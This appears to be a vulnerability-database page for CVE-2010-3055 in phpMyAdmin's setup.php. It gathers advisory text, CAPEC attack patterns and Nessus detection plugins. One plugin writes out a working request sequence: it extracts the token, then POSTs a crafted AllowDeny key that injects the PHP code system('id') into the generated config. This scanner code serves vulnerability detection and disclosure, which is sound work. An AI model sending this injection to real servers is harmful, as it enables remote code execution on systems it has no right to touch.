Vulnerabilities > CVE-2010-3055 - Permissions, Privileges, and Access Controls vulnerability in PHPmyadmin

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN

Summary

The configuration setup script (aka scripts/setup.php) in phpMyAdmin 2.11.x before 2.11.10.1 does not properly restrict key names in its output file, which allows remote attackers to execute arbitrary PHP code via a crafted POST request.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Blue Boxing
    This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
  • Restful Privilege Elevation
    Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
  • Target Programs with Elevated Privileges
    This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-2097.NASL
    descriptionSeveral remote vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2010-3055 The configuration setup script does not properly sanitise its output file, which allows remote attackers to execute arbitrary PHP code via a crafted POST request. In Debian, the setup tool is protected through Apache HTTP basic authentication by default. - CVE-2010-3056 Various cross site scripting issues have been discovered that allow a remote attacker to inject arbitrary web script or HTML.
    last seen2020-06-01
    modified2020-06-02
    plugin id48924
    published2010-08-30
    reporterThis script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/48924
    titleDebian DSA-2097-1 : phpmyadmin - insufficient input sanitising
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-2097. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(48924);
      script_version("1.11");
      script_cvs_date("Date: 2019/08/02 13:32:22");
    
      script_cve_id("CVE-2010-3055", "CVE-2010-3056");
      script_bugtraq_id(42591);
      script_xref(name:"DSA", value:"2097");
    
      script_name(english:"Debian DSA-2097-1 : phpmyadmin - insufficient input sanitising");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several remote vulnerabilities have been discovered in phpMyAdmin, a
    tool to administer MySQL over the web. The Common Vulnerabilities and
    Exposures project identifies the following problems :
    
      - CVE-2010-3055
        The configuration setup script does not properly
        sanitise its output file, which allows remote attackers
        to execute arbitrary PHP code via a crafted POST
        request. In Debian, the setup tool is protected through
        Apache HTTP basic authentication by default.
    
      - CVE-2010-3056
        Various cross site scripting issues have been discovered
        that allow a remote attacker to inject arbitrary web
        script or HTML."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2010-3055"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/CVE-2010-3056"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2010/dsa-2097"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the phpmyadmin package.
    
    For the stable distribution (lenny), these problems have been fixed in
    version 2.11.8.1-5+lenny5."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:phpmyadmin");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:5.0");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/08/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/08/29");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/08/30");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"5.0", prefix:"phpmyadmin", reference:"2.11.8.1-5+lenny5")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCGI abuses
    NASL idPHPMYADMIN_PMASA_2010_4.NASL
    descriptionThe setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection. A remote attacker could exploit this by using the setup script to generate a configuration file with injected PHP code, save it on the server, and load it, causing arbitrary PHP code to be executed with the privileges of the web server.
    last seen2020-06-01
    modified2020-06-02
    plugin id48908
    published2010-08-27
    reporterThis script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/48908
    titlephpMyAdmin setup.php Arbitrary PHP Code Execution (PMASA-2010-4)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    
    if (description)
    {
      script_id(48908);
      script_version("1.12");
      script_cvs_date("Date: 2018/11/15 20:50:18");
    
      script_cve_id("CVE-2010-3055");
      script_bugtraq_id(42591);
      script_xref(name:"Secunia", value:"41058");
    
      script_name(english:"phpMyAdmin setup.php Arbitrary PHP Code Execution (PMASA-2010-4)");
      script_summary(english:"Checks if code can be injected into the config file");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "The remote web server contains a PHP application that may allow
    execution of arbitrary code."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "The setup script included with the version of phpMyAdmin installed on
    the remote host does not properly sanitize user-supplied input before
    using it to generate a config file for the application.  Submitting a
    specially crafted POST request can result in arbitrary PHP code
    injection.
    
    A remote attacker could exploit this by using the setup script to
    generate a configuration file with injected PHP code, save it on
    the server, and load it, causing arbitrary PHP code to be executed
    with the privileges of the web server."
      );
       # http://sourceforge.net/tracker/?func=detail&aid=3045132&group_id=23067&atid=377408
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b30f398f");
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.phpmyadmin.net/security/PMASA-2010-4/"
      );
      script_set_attribute(attribute:"solution", value:"Upgrade to phpMyAdmin 2.11.10.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/08/15");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/08/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/08/27");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
    
      script_dependencies("phpMyAdmin_detect.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/phpMyAdmin", "www/PHP");
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("url_func.inc");
    
    
    port = get_http_port(default:80, php:TRUE);
    install = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);
    
    # Bail on versions >= 3.x, which are not vulnerable
    if (install['ver'] =~ '^[0-9]' && install['ver'] !~ '^[0-2]\\.')
      exit(0, 'phpMyAdmin '+install['ver']+' on port '+port+' is not affected.');
    
    # The first request makes sure the page exists, the PMA config is writeable,
    # and extracts the token
    url = install['dir']+'/scripts/setup.php';
    full_url = build_url(qs:install['dir']+'/', port:port);
    res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
    
    # If the config can't be written to disk, this cannot be exploited - even
    # if the software is unpatched.  In which case, only continue if paranoid.
    if ('Can not load or save configuration' >< res[2])
    {
      if (report_paranoia < 2)
        exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');
      else
        config_writeable = FALSE;
    }
    else config_writeable = TRUE;
    
    # Extract the token.
    token = NULL;
    pat = 'input type="hidden" name="token" value="([^"]+)"';
    match = eregmatch(string:res[2], pattern:pat);
    if (match) token = match[1];
    else exit(1, "Unable to extract token from "+build_url(qs:url, port:port));
    
    # The second request attempts to inject the PHP code
    watermark = SCRIPT_NAME+'-'+unixtime();  # this lets us know if a config was generated
    phpcode = "system('id')";
    expected_out1 = 'Servers (1)</div><div class="data">' + watermark;
    expected_out2 = "$cfg['Servers'][$i]['AllowDeny']['order']['a']['b'][''." + phpcode + ".''] = '1';";
    
    postdata =
      'token='+token+'&'+
      'action=addserver_real&'+
      'host='+watermark+'&'+
      'submit_save=Add&'+
      'AllowDeny_order=1&'+
      'AllowDeny[a][b][\'.' + phpcode + '.\']=1';
    res = http_send_recv3(
      method:"POST",
      item:url,
      port:port,
      data:postdata,
      content_type:"application/x-www-form-urlencoded",
      exit_on_fail:TRUE
    );
    
    # If a config was generated (whether injection worked or not),
    # the response should at least show the hostname we provided
    if (expected_out1 >!< res[2])
      exit(1, 'Config generation failed for PMA install at '+full_url);
    
    # The third request checks to see if it was successful
    res = http_send_recv3(
      method:"POST",
      item:url,
      port:port,
      data:'token='+token+'&action=download',
      content_type:"application/x-www-form-urlencoded",
      exit_on_fail:TRUE
    );
    
    if (expected_out2 >< res[2])
    {
      if (report_verbosity > 0)
      {
        report =
          '\nBy making a series of requests, Nessus was able to determine the'+
          '\nfollowing phpMyAdmin installation is vulnerable :\n\n' +
          '  ' + full_url + '\n';
    
        if (!config_writeable)
        {
          report +=
            '\nEven though the software is unpatched, the web server does not'+
            '\nhave permission to write the configuration file to disk, which'+
            '\nmeans the vulnerability cannot be exploited at this time.\n';
        }
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
    }
    else exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201201-01.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201201-01 (phpMyAdmin: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details. Impact : Remote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id57433
    published2012-01-05
    reporterThis script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/57433
    titleGLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities